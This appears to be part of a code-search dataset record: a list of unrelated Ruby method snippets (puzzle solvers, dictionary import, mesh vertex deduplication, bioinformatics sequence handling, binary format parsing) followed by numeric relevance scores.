"def get_unique_permutations annotation_time_slot\r\n\t\treturn annotation_time_slot.uniq.permutation.to_a\r\n\tend",
"def find_exact_match\n exact = 0\n index = 0\n 4.times.map do\n if @temp_code[index] == @temp_guess[index]\n exact += 1\n @temp_code.delete_at(index)\n @temp_guess.delete_at(index)\n else\n index += 1\n end\n end\n exact\n end",
"def matches(max_mismatches)\n out = []\n\n (0..text_len-patt_len).each do |i|\n out << i if quasi_match?(i, max_mismatches)\n end\n\n out\n end",
"def antimoniker(io)\n { count: io.read(4).unpack('V').first } # count (4 bytes): An unsigned integer that specifies the number of anti-monikers that have been composed together to create this instance. When an anti-moniker is composed with another anti-moniker, the resulting composition would have a count field equaling the sum of the two count fields of the composed anti-monikers. This value MUST be less than or equal to 1048576.\n end",
"def find_claiming_pair\n iterator((1..3)){|col,line|\n scan_claiming_pair_line(col,line)\n reduce_solved\n scan_claiming_pair_col(col,line)\n reduce_solved\n }\n self\n end",
"def possible_fields(map, nums)\n result = Set.new()\n map.each do |field, ranges|\n if all_in_ranges?(nums, ranges)\n result << field \n end\n end\n result\nend",
"def nucleotide_counts\n hash = {}\n @valid_inputs.each do |i|\n hash[i] = @dna.count i\n end\n hash\n end",
"def redundancy(array, sensitive=true)\n if sensitive == false\n array = lower(array)\n end\n base = array.to_a.sort! { |x, y| x.to_s <=> y.to_s }.uniq\n occurence = {}\n n, b = 0, 0\n base.each do |x|\n while x == array[n]\n n += 1\n end\n occurence[x] = n - b\n b = n\n end\n puts occurence\nend",
"def missing_values(a)\n hash_values = {}\n a.each {|nb| hash_values[nb] = a.count(nb) }\n hash_values.delete_if {|nb, count| count == 3 }\n once, twice = 0, 0\n hash_values.each do |nb, count|\n once = nb if count == 1\n twice = nb if count == 2\n end\n once * once * twice\nend",
"def parse_kanjidic lines\n line_number=1\n # get id values from the tables for the various attributes such as kunyomi, onyomi etc\n # to be used in the join tables \n readings_to_import= {}\n @lookup_attributes.each do |column|\n #stores readings in a hash of arrays with the key being\n #the attribute name e.g. :nanori, :kunyomi, etc\n readings_to_import[column]=[]\n end \n\n\n #create empty arrays to store index values\n indexes_to_import= [] #2D array of [[dictionary_id, kanji_id, index_value],...]\n\n lines.each do |line|\n unless line_number == 1\n kanji = get_element(:kanji,line)\n kanji_id = @kanji_lookup[kanji]\n #for each of nanori, onyomi, meanings, pinyin etc\n @lookup_attributes.each do |column| \n #get each of the multiple value attributes and append them to an array \n #to import at the end\n klass = eval(column.to_s.capitalize)\n relation_klass = eval(column.to_s.capitalize.pluralize+\"Kanji\")\n lookup = \"@#{column}_lookup\"\n #puts lookup\n lookup = eval(lookup)\n\n values = get_element(column, line)\n values.each do |value|\n #e.g. equivalent to o=Onyomi.find_by_onyomi onyomi\n relation_id = lookup[value]\n # e.g. equivalent to array << OnyomisKanji.new(:kanji_id=>id,:onyomi_id =>o.id)\n readings_to_import[column] << [kanji_id ,relation_id]\n end\n end \n\n #for the indexes we have a KanjiIndex table an Dictionaries table\n #and a KanjiIndex has a dictionary_id column\n @index_names.each do |index_name|\n indexes_to_import += get_dictionary_index(index_name, line)\n end\n\n end\n line_number +=1\n end\n return readings_to_import, indexes_to_import\n end",
"def unify_dup_verts\n # might be more memory efficient to use the index, though this method is simpler\n \n matches = []\n duplicates = Hash.new\n i = -1\n summary = @vbuffer.buffer.to_a.map { |t| t << i += 1 }.sort!\n # summary = NArray.hcat(@vbuffer.buffer, NArray[0...@vbuffer.buffer.shape.last].reshape(1,@vbuffer.buffer.shape.last)).to_a.sort!\n complete = false\n \n until complete do\n (v = summary.shift) or (complete = true) # loop must run once more than there are items in summary\n if (v[2] == matches.last[2] && v[1] == matches.last[1] && v[0] == matches.last[0] rescue false)\n matches << v\n elsif matches.count > 1\n dups = matches.map(&:last)\n primary = dups.shift\n duplicates[primary] = dups\n \n # Replace normal of primary duplicate with an average of the normals of all duplicates\n @vnbuffer.update primary => @vnbuffer.avg_normal(dups)\n \n matches = [v]\n else\n duplicates[matches.first.last] = [] if matches.first\n matches = [v]\n end\n end\n primaries = duplicates.keys.sort!\n secondaries = duplicates.values.flatten.sort!\n \n # Build a map from indices of duplicates onto primary indices remapped for the removal of secondary duplicates \n index_map = Hash.new\n p = s = 0\n while p < primaries.size\n s += 1 while (primaries[p] > secondaries[s] rescue false)\n index_map[primaries[p]] = primaries[p] - s\n duplicates[primaries[p]].each { |sec| index_map[sec] = primaries[p] - s }\n p += 1\n end\n \n # update buffers\n @vbuffer.remove_and_optimize secondaries\n @vnbuffer.remove_and_optimize secondaries\n @fbuffer.remap index_map\n [@vbuffer, @vnbuffer, @fbuffer].each { |b| b.build_index }\n self\n end",
"def known_invalid_idref(mapkey, oldid)\n\treturn false;\n\t# \treturn ( ((mapkey==:version or mapkey==:fixfor) and oldid==21907 or oldid==21881 or oldid==21743) or\n\t# \t\t\t(mapkey==:version and (oldid==21240 or oldid==21743)) or \n\t# \t\t\t(mapkey==:issuestatus and (oldid==2 or oldid==-3)) or\n\t# \t\t\t(mapkey==:resolution and oldid==6)\n\t# \t )\nend",
"def conflicts\n @grid.values.select { |claims| claims.size > 1 }\n end",
"def problem_79\n digits = []\n lines = open(\"keylog.txt\").reduce([]) do |a,l|\n a << l.chomp.split(//).map(&:to_i)\n end\n p = lines.transpose\n loop do \n first = (p[0] - p[1]).uniq\n if first.length == 1\n d = first[0]\n digits << d \n puts \"Remove #{d}\"\n # shift off leading 'd' values\n lines.select {|l| l[0] == d}.map {|l| l.shift; l.push nil }\n # Rebuild out first, second, third arrays\n p = lines.transpose\n return digits.map(&:to_s).join if p.flatten.compact.length == 0\n puts \"len = #{p.flatten.compact.length}\"\n else\n raise \"Trouble - 2 candidates : #{first.inspect}, rework algorithm\"\n end\n end\nend",
"def scan_gene_blo_seqs\n GeneBloSeq.destroy_all\n\n genes = Gene.find(:all)\n\n genes.each { |gn|\n\n #assemble gene file location\n gene_blo_runs_f = \"#{AppConfig.gene_blo_runs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_f = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_p = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.phy\"\n\n \n gene_blo_runs_oa = @ud.fastafile_to_original_alignment(gene_blo_runs_f)\n gene_blo_seqs_oa = Bio::Alignment::OriginalAlignment.new\n\n\n\n puts \"gn.seqs_orig_nb:#{gn.seqs_orig_nb} oa_size: #{gene_blo_runs_oa.size}\"\n\n #schould be equal\n #should insert assertion here or make an rspec to detect source\n #puts oa.keys\n\n gene_blo_runs_oa.each_pair { |key, seq|\n puts key, seq\n gbs = GeneBloSeq.new\n #find corresponding gi\n ns = NcbiSeq.find_by_vers_access(key)\n #link to objects gene and gi\n gbs.gene = gn\n gbs.ncbi_seq = ns\n gbs.save\n gene_blo_seqs_oa.add_seq(seq,ns.id)\n\n }\n \n #save fasta file \n @ud.string_to_file(gene_blo_seqs_oa.output(:fasta),gene_blo_seqs_f)\n #save phylip file\n @ud.string_to_file(gene_blo_seqs_oa.output(:phylip),gene_blo_seqs_p)\n\n\n\n\n }\n\n end"
] |
[
"0.65094244",
"0.6354108",
"0.57296443",
"0.5531168",
"0.54432726",
"0.54402244",
"0.54064965",
"0.5360847",
"0.5306777",
"0.527252",
"0.52692294",
"0.5225156",
"0.5133353",
"0.5085653",
"0.50643885",
"0.50435126",
"0.50378704",
"0.5035234",
"0.49929872",
"0.49865535",
"0.49697682",
"0.4964372",
"0.49612007",
"0.4956641",
"0.493248",
"0.4931533",
"0.48883837",
"0.48725623",
"0.48672688",
"0.4867254",
"0.48531386",
"0.48523074",
"0.48420313",
"0.48229152",
"0.47994918",
"0.47979245",
"0.47969908",
"0.47955465",
"0.47905958",
"0.47776252",
"0.47745028",
"0.47701082",
"0.47499034",
"0.4743056",
"0.4715303",
"0.46977043",
"0.46968576",
"0.4669405",
"0.4665471",
"0.46581677",
"0.46580502",
"0.464931",
"0.46411237",
"0.46410504",
"0.46389547",
"0.46377444",
"0.46363863",
"0.46350136",
"0.46340284",
"0.46231067",
"0.46214435",
"0.4614428",
"0.46105963",
"0.46021858",
"0.45884085",
"0.45878732",
"0.45858407",
"0.4584387",
"0.45823345",
"0.45804432",
"0.45804432",
"0.45804432",
"0.45804432",
"0.45804432",
"0.45804432",
"0.45742446",
"0.45680216",
"0.45678994",
"0.45650622",
"0.4563955",
"0.45624518",
"0.45624304",
"0.45616433",
"0.45598108",
"0.4558317",
"0.4556638",
"0.45544174",
"0.45515963",
"0.4550756",
"0.45461014",
"0.45392558",
"0.45369408",
"0.45346522",
"0.45261237",
"0.45227346",
"0.45191744",
"0.45176324",
"0.45125693",
"0.45040688",
"0.44946417"
] |
0.5501095
|
4
|
GET /services GET /services.xml
|
def index
  submenu_item 'services-index'
  @services = Service.paginate query(:page => params[:page])
  @service_types = ServiceType.all :select => "distinct service_types.id, service_types.name, service_types.alias, service_types.serviceable_type", :joins => "inner join services t1 on t1.type_id = service_types.id and t1.tenant_id = #{current_user.tenant_id}"
  status_tab
  session[:service_summary] = @summary
  respond_to do |format|
    format.html # index.html.erb
    format.xml { render :xml => @services }
    format.csv {
      # NOTE: @service is never assigned in this action (only @services is);
      # the CSV export presumably relies on a filter setting it elsewhere.
      send_data(@service.metric_data, :type => 'text/csv; header=present', :filename => 'chart_data.csv')
    }
  end
end
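
The index action above answers both GET /services and GET /services.xml from a single respond_to block; the pagination helper and the tenant-scoped join obscure the underlying Rails convention. Below is a minimal sketch of that same convention, assuming nothing beyond a plain Service ActiveRecord model; the controller is illustrative, not the app's actual code.

# Minimal sketch of the RESTful index convention used above; pagination,
# the custom query helper, and the tenant-scoped service_types join are
# omitted as app-specific. Hash-rocket syntax matches the original's era.
class ServicesController < ApplicationController
  # GET /services
  # GET /services.xml
  def index
    @services = Service.all

    respond_to do |format|
      format.html # renders app/views/services/index.html.erb
      format.xml { render :xml => @services } # serializes the whole collection
    end
  end
end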
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
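
The objective block above marks this row as a (query, document, negatives) triplet: one natural-language query, one positive code snippet, and a list of hard negatives with retrieval scores. As a sketch of how such a row might be consumed, assuming it has already been parsed into a Ruby hash keyed by the column names shown in this dump (the helper name and score cutoff are illustrative):

# Hypothetical consumer for one row of this dump; assumes the row is a
# Hash with "query", "document", "negatives", and "negative_scores" keys.
def to_triplets(row, max_negative_score: 0.7)
  anchor = row["query"]
  positive = row["document"]
  pairs = row["negatives"].zip(row["negative_scores"].map(&:to_f))
  # Drop negatives that score close enough to be likely false negatives.
  pairs.select { |_neg, score| score <= max_negative_score }
       .map { |neg, score| { anchor: anchor, positive: positive, negative: neg, score: score } }
end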
|
[
"def index\n endpoint(get(services_url).body)\n end",
"def list_services\n response = @http_client.get(prefix_path('services'))\n Response.new(response)\n end",
"def all(options = {})\n out = xml_run build_command('services', options.merge(:get => XML_COMMANDS_GET))\n convert_output(out.fetch(:stream, {}).fetch(:service_list, {}).fetch(:service, []), :service)\n end",
"def services\n params = { command: 'account_services' }\n get('/json.php', params)\n end",
"def service(id)\n request :get, \"/services/#{id}\"\n end",
"def services(query = {})\n get('service', query)\n end",
"def url\n resource.url + '/services'\n end",
"def show\n @service = Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def get_services()\n return get_request(address(\"/OS-KSADM/services\"), token())\n end",
"def show\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def show\n @page_id = \"services\"\n @service = Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def list_services\n @services\n end",
"def get_services\n reply = @client.call(:get_services)\n\n data = reply.body.dig(:get_services_response,\n :get_services_result,\n :array_of_string)\n data = check_if_data_exists(data)\n\n data.map do |attrs|\n {\n id: Integer(attrs[:string][0], 10),\n name: attrs[:string][1]\n }\n end\n end",
"def services\n\t\tService.find(:all)\n\tend",
"def service_list\n uri = URI.parse(@url)\n http = Net::HTTP.new(uri.host, uri.port, @proxy_addr, @proxy_port)\n http.use_ssl = true\n http.verify_mode = OpenSSL::SSL::VERIFY_NONE\n request = Net::HTTP::Get.new(uri.request_uri)\n request.basic_auth user, passwd\n request.add_field 'X-ID-TENANT-NAME', id_domain\n http.request(request)\n end",
"def services\n ret = []\n offset = 0\n loop do\n cur = get(\"services?limit=#{PAGINATION_SIZE}&offset=#{offset}\")\n offset += PAGINATION_SIZE\n ret.push *cur.services\n break if offset >= cur.total\n end\n ret\n end",
"def index\n @title = \"Services - JC Auto Restoration, Inc.\"\n @services = Service.all\n end",
"def index\n @services = Service.all(:order => \"did_at DESC\")\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @services }\n end\n end",
"def index\n @services = @page.services.all\n \n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @services }\n end\n end",
"def services\n response = JSON.parse(@client.get(\"/api/v1/services\").body)\n return response[\"services\"] || response\n end",
"def services\n\n end",
"def services\n end",
"def services\n services = @saloon.services\n\n render_success(data: services, each_serializer: ServiceSerializer)\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.find_all_by_user_id(current_user.account_id)\n\n respond_to do |format|\n format.html # index.html.haml\n format.json { render json: @services }\n end\n end",
"def index\n @request_services = RequestService.all\n end",
"def lookup_services(extension, arg)\n extension += \"/#{arg}\"\n uri = URI.parse(API_URL + extension)\n response = connect(uri)\n puts response.body\n end",
"def index\n @service_versions = ServiceVersion.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @service_versions }\n end\n end",
"def services\n\tend",
"def service_document\n response = get(@url.to_s)\n response.body\n end",
"def index\n @xservices = Xservice.all\n end",
"def get_services(nickname = nil)\n nickname ||= @nickname\n agent = get_login_agent()\n\n services_uri = ROOT_URI + (\"/%s/services\" % URI.encode(nickname))\n parser = agent.get(services_uri).parser\n\n active_servicelist = parser.xpath(\"//*[@class='active']//ul[@class='servicelist']\")\n\n if !active_servicelist.empty?\n services = active_servicelist.xpath(\"./li/a\").map { |a|\n {\n 'service' => a['class'].split.find { |a_class|\n a_class != 'l_editservice' && a_class != 'service'\n },\n 'serviceid' => a['serviceid'].to_s,\n }\n }\n profile_uri = ROOT_URI + (\"/%s\" % URI.encode(nickname))\n agent.get(profile_uri).parser.xpath(\"//div[@class='servicespreview']/a\").each_with_index { |a, i|\n href = (profile_uri + a['href'].to_s).to_s\n break if profile_uri.route_to(href).relative?\n services[i]['profileUrl'] = href\n }\n else\n services = parser.xpath(\"//ul[@class='servicelist']/li/a\").map { |a|\n {\n 'service' => a['class'].split.find { |a_class|\n a_class != 'service'\n },\n 'profileUrl' => (services_uri + a['href'].to_s).to_s,\n }\n }\n end\n services\n end",
"def index\n @per_page_options = %w{ 21 51 99 }\n respond_to do |format|\n format.html # index.html.erb\n format.xml # index.xml.builder\n format.atom # index.atom.builder\n format.json { render :json => ServiceCatalographer::Api::Json.index(\"services\", json_api_params, @services).to_json }\n format.bljson { render :json => ServiceCatalographer::Api::Bljson.index(\"services\", @services).to_json }\n end\n end",
"def index\n @service = Service.all()\n end",
"def index\n apis = site_account.api_docs_services\n .published\n .with_system_names((params[:services] || \"\").split(\",\"))\n .select{ |api| api.specification.swagger_1_2? }\n\n respond_with({\n swaggerVersion: \"1.2\",\n apis: apis.map!{ |service| swagger_spec_for(service) },\n basePath: \"#{request.protocol}#{request.host}\"\n })\n end",
"def show\n @service = Service.find(params[:id])\n \n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def list_vs_services(options)\n options['method'] = \"vs\"\n dir_list = get_dir_item_list(options)\n message = \"vSphere Services:\"\n handle_output(options,message)\n dir_list.each do |service|\n handle_output(options,service)\n end\n handle_output(options,\"\")\n return\nend",
"def show\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def get_xml\n response = @api.request(:get, @location, type: 'xml')\n response.body if response.status == 200\n end",
"def get_service(nickname = nil)\n nickname ||= @nickname\n agent = get_web_agent()\n\n services_uri = ROOT_URI + (\"/%s/services\" % URI.encode(nickname))\n parser = agent.get(services_uri).parser\n\n active_servicelist = parser.xpath(\"//*[@class='active']//ul[@class='servicelist']\")\n\n if !active_servicelist.empty?\n services = active_servicelist.xpath(\"./li/a\").map { |a|\n {\n 'service' => a['class'].split.find { |a_class|\n a_class != 'l_editservice' && a_class != 'service'\n },\n 'serviceid' => a['serviceid'].to_s,\n }\n }\n else\n services = parser.xpath(\"//ul[@class='servicelist']/li/a\").map { |a|\n {\n 'service' => a['class'].split.find { |a_class|\n a_class != 'service'\n },\n 'profileUrl' => (services_uri + a['href'].to_s).to_s,\n }\n }\n end\n services\n end",
"def services()\n return @data[\"access\"][\"serviceCatalog\"]\n end",
"def show\n @approximate_service = ApproximateService.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @approximate_service }\n end\n end",
"def show\n @service = Service.find(params[:id])\n end",
"def show\n @service = Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def show\n @service = Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def show\n @service = Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def list_services(client, args, options)\n response = client.get(RESOURCE_PATH)\n\n if CloudClient::is_error?(response)\n [response.code.to_i, response.to_s]\n else\n #[0,response.body]\n if options[:json]\n [0,response.body]\n else\n array_list = JSON.parse(response.body)\n SERVICE_TABLE.show(array_list['DOCUMENT_POOL']['DOCUMENT'])\n 0\n end\n end\nend",
"def show\n @service_log = ServiceLog.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_log }\n end\n end",
"def show\n @service = Service.find(params[:id])\n end",
"def index\n @emt_services = EmtService.all\n end",
"def get_services(opts = {})\n data, _status_code, _headers = get_services_with_http_info(opts)\n data\n end",
"def show\n @service_version = ServiceVersion.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_version }\n end\n end",
"def index\n delocalize_dates([:from_fecha_hora_greater_than_or_equal_to, :from_fecha_hora_less_than_or_equal_to]) if params[:search]\n @services = do_index(Service, params)\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @services }\n end\n end",
"def index\n @api_docs_services = api_docs_services.all\n respond_with(@api_docs_services)\n end",
"def show\n @complex_service = ComplexService.find(params[:id])\n\t\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @complex_service }\n end\n end",
"def index\n services = accessible_services.includes(:proxy, :account).order(:id).paginate(pagination_params)\n respond_with(services)\n end",
"def index\n services = accessible_services.includes(:proxy, :account).order(:id).paginate(pagination_params)\n respond_with(services)\n end",
"def get_all(options = {})\n custom_params = options[:dc] ? use_named_parameter('dc', options[:dc]) : nil\n ret = send_get_request(@conn, ['/v1/catalog/services'], options, custom_params)\n OpenStruct.new JSON.parse(ret.body)\n end",
"def show\n @service_checker = ServiceChecker.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_checker }\n end\n end",
"def show\n @final_service = FinalService.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @final_service }\n end\n end",
"def servers(service_id)\n request :get, \"/services/#{service_id}/servers\"\n end",
"def api_xml(path,method=:get,options={})\n xml_message(amee,\"/data\"+path,method,options)\n end",
"def sword_services\n Utility.find_elements_by_namespace_and_name(extensions, \"http://purl.org/net/sword/terms/\", \"service\")\n end",
"def show\n @service_center = ServiceCenter.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_center }\n end\n end",
"def services\n @services_manager\n end",
"def index\n @service_requests = ServiceRequest.all\n end",
"def show\n @service_line = ServiceLine.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_line }\n end\n end",
"def list\n get('/')\n end",
"def list_services\n services.map do |service|\n Hashie::Mash.new({\n service: service,\n display_name: service_display_name(service),\n id: service_id(service)\n })\n end\n end",
"def service_request(service); end",
"def index\n @services = Service.where search_params\n respond_with @services if stale? @services\n end",
"def loadservices\n yml = YAML::load(File.open('services.yml'))\n yml.each do |el| \n puts \"grabbing info for #{el[1]['name']}\"\n yml = infoFor(el[1]['regex'])\n logyml(el[1]['name'], yml)\n\n puts \"sending info for #{el[1]['name']}\"\n sendreport(el[1]['name'])\n end\n end",
"def test_get_services\n services =\n AdWords::Service.get_services(AdWords::Service.get_versions.first)\n\n assert_kind_of(Array, services, 'Service list is not an array')\n\n services.each do |service|\n assert_kind_of(String, service, 'Service name is not a string')\n end\n end",
"def index\n @scheduled_services = ScheduledService.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @scheduled_services }\n end\n end",
"def service_requests_list\n @service_requests = ServiceRequest.get_all_service_requests(@page)\n end",
"def get_all options=nil\n url = [\"/v1/catalog/services\"]\n url += check_acl_token\n url << use_named_parameter('dc', options[:dc]) if options and options[:dc]\n begin\n ret = @conn.get concat_url url\n rescue Faraday::ClientError\n raise Diplomat::PathNotFound\n end\n\n return OpenStruct.new JSON.parse(ret.body)\n end",
"def index\n respond_with(accessible_services)\n end",
"def index\n @service_plans = ServicePlan.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @service_plans }\n end\n end",
"def get_listings_xml(url)\n @client.get_content(url)\n end",
"def services\n begin\n resp = _get build_agent_url('services')\n rescue\n logger.warn('Unable to request all the services on this through the HTTP API')\n return nil\n end\n # Consul returns id => ConsulServiceObjects.\n s_hash = JSON.parse(resp)\n s_hash.keys.map { |n| Consul::Model::Service.new.extend(Consul::Model::Service::Representer).from_hash(s_hash[n]) }\n end",
"def show\n @service = current_user.pro.services.find(params[:id])#Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def query_service(service)\n #remove on production/create testing case?\n resp = @client.get_content(service)\n @@logger.debug \"Service succesfully queried\"\n\n return resp\n end",
"def rest_get(uri)\n \n request = Net::HTTP::Get.new uri\n request.add_field(\"Accept\",\"application/xml\")\n auth_admin(request)\n \n Net::HTTP.start(uri.host, uri.port) do |http|\n response = http.request request\n response.value\n\n doc = REXML::Document.new response.body\n \n return doc\n \n end\n \nend",
"def service_uri\n \"#{host}#{service_path}\"\n end",
"def index\n @serviceordemservices = Serviceordemservice.all\n end",
"def xml(options = {})\n http = Net::HTTP.new(Picasa.host, 443)\n http.use_ssl = true\n http.verify_mode = OpenSSL::SSL::VERIFY_NONE\n path = Picasa.path(options)\n response = http.get(path, auth_header)\n if response.code =~ /20[01]/\n response.body\n elsif response.code.to_i == 403\n raise RubyPicasa::PicasaError, \"Authentication failed. You may need to refresh your access token.\"\n end\n end",
"def index\n @servicemen = Serviceman.all\n end",
"def services\n @services ||= []\n end",
"def services\n return @services\n end",
"def index\n @call_services = CallService.all\n end",
"def index\n @admin_services = Admin::Service.all.order(sort_column + \" \" + sort_direction)\n respond_to do |format|\n format.html { @admin_services = [] }\n format.json { render \"index\" }\n format.xml { render xml: @admin_services }\n end\n end",
"def show\n @online_service = OnlineService.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @online_service }\n end\n end",
"def find_service(id)\n self.class.get(\"/services/#{id}.json?apikey=#{apikey}\")\n end"
] |
[
"0.7579505",
"0.73009115",
"0.6991401",
"0.6859058",
"0.6828459",
"0.6824559",
"0.658619",
"0.6579678",
"0.65689564",
"0.6517968",
"0.65074795",
"0.64588135",
"0.64162534",
"0.6404057",
"0.63568646",
"0.6342013",
"0.63139445",
"0.63027984",
"0.62867755",
"0.6264572",
"0.62580806",
"0.62186974",
"0.621688",
"0.6194851",
"0.6194851",
"0.6194851",
"0.6194851",
"0.6194851",
"0.6194851",
"0.6194851",
"0.6194851",
"0.6194851",
"0.61681616",
"0.6166474",
"0.61637163",
"0.6163135",
"0.60997784",
"0.604961",
"0.6025336",
"0.59895635",
"0.59878176",
"0.5986825",
"0.598188",
"0.597116",
"0.59686816",
"0.5962249",
"0.59370905",
"0.59344715",
"0.592974",
"0.59215057",
"0.5902138",
"0.58865136",
"0.58865136",
"0.58865136",
"0.5876564",
"0.5871422",
"0.58712673",
"0.5868576",
"0.5865096",
"0.584527",
"0.5836437",
"0.5821756",
"0.58196795",
"0.58060557",
"0.58060557",
"0.5795837",
"0.57913756",
"0.57877845",
"0.5786198",
"0.5781673",
"0.5780788",
"0.57784486",
"0.57781404",
"0.57624316",
"0.5761933",
"0.5759955",
"0.5752373",
"0.574108",
"0.5733645",
"0.5732259",
"0.57263213",
"0.5720132",
"0.5710146",
"0.5704606",
"0.5704158",
"0.570115",
"0.56952345",
"0.56914824",
"0.5687783",
"0.5678397",
"0.56605613",
"0.5639137",
"0.563661",
"0.5635764",
"0.56327707",
"0.56305385",
"0.56302804",
"0.5624251",
"0.56208557",
"0.56196064",
"0.5613945"
] |
0.0
|
-1
|
GET /services/1 GET /services/1.xml
|
def show
  @service = Service.find(params[:id], :conditions => conditions)
  @alerts = Alert.all({
    :conditions => ["service_id = ? and severity <> 0", @service.id]
  })
  params[:date] = Date.today.to_s if params[:date].blank?
  @date_range = parse_date_range params[:date]
  @metric = @service.metric
  now = Time.now
  #now = Time.parse("2010-6-10 12:00") #for test
  d = @metric.history({:start => now - 24*60*60, :finish => now})
  if d.size > 0
    @history_views = @service.history_views
    @history_views.each do |view|
      view.data = d
    end
  end
  d = @metric.current
  if d
    @default_view = @service.default_view
    @default_view.data = d if @default_view
    @current_views = @service.views
    @current_views.each do |view|
      view.data = d
    end
  end
  respond_to do |format|
    format.html # show.html.erb
    format.xml {
      #render :xml => @service.to_xml(:dasherize => false)
    }
  end
end
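
The show action pairs with GET /services/1 and GET /services/1.xml: it looks one record up by params[:id], assembles its alerts and metric views, then branches on the requested format. Note that its format.xml block currently renders nothing because the render call is commented out. The sketch below keeps only the REST skeleton and restores that commented serialization; the alert and metric assembly is app-specific and omitted, so treat this as an illustration rather than the app's real controller.

# Minimal sketch of the RESTful show convention from the action above.
class ServicesController < ApplicationController
  # GET /services/1
  # GET /services/1.xml
  def show
    @service = Service.find(params[:id])

    respond_to do |format|
      format.html # renders app/views/services/show.html.erb
      format.xml { render :xml => @service.to_xml(:dasherize => false) }
    end
  end
end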
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def service(id)\n request :get, \"/services/#{id}\"\n end",
"def index\n endpoint(get(services_url).body)\n end",
"def show\n @service = Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def show\n @page_id = \"services\"\n @service = Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def list_services\n response = @http_client.get(prefix_path('services'))\n Response.new(response)\n end",
"def show\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def all(options = {})\n out = xml_run build_command('services', options.merge(:get => XML_COMMANDS_GET))\n convert_output(out.fetch(:stream, {}).fetch(:service_list, {}).fetch(:service, []), :service)\n end",
"def services(query = {})\n get('service', query)\n end",
"def url\n resource.url + '/services'\n end",
"def lookup_services(extension, arg)\n extension += \"/#{arg}\"\n uri = URI.parse(API_URL + extension)\n response = connect(uri)\n puts response.body\n end",
"def index\n @service_versions = ServiceVersion.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @service_versions }\n end\n end",
"def index\n @services = Service.all(:order => \"did_at DESC\")\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @services }\n end\n end",
"def services\n params = { command: 'account_services' }\n get('/json.php', params)\n end",
"def show\n @service_version = ServiceVersion.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_version }\n end\n end",
"def service_list\n uri = URI.parse(@url)\n http = Net::HTTP.new(uri.host, uri.port, @proxy_addr, @proxy_port)\n http.use_ssl = true\n http.verify_mode = OpenSSL::SSL::VERIFY_NONE\n request = Net::HTTP::Get.new(uri.request_uri)\n request.basic_auth user, passwd\n request.add_field 'X-ID-TENANT-NAME', id_domain\n http.request(request)\n end",
"def show\n @approximate_service = ApproximateService.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @approximate_service }\n end\n end",
"def service_request(service); end",
"def show\n @service_log = ServiceLog.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_log }\n end\n end",
"def show\n @service = Service.find(params[:id])\n end",
"def index\n @title = \"Services - JC Auto Restoration, Inc.\"\n @services = Service.all\n end",
"def show\n @service = Service.find(params[:id])\n end",
"def services\n\n end",
"def get_services\n reply = @client.call(:get_services)\n\n data = reply.body.dig(:get_services_response,\n :get_services_result,\n :array_of_string)\n data = check_if_data_exists(data)\n\n data.map do |attrs|\n {\n id: Integer(attrs[:string][0], 10),\n name: attrs[:string][1]\n }\n end\n end",
"def show\n @service_checker = ServiceChecker.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_checker }\n end\n end",
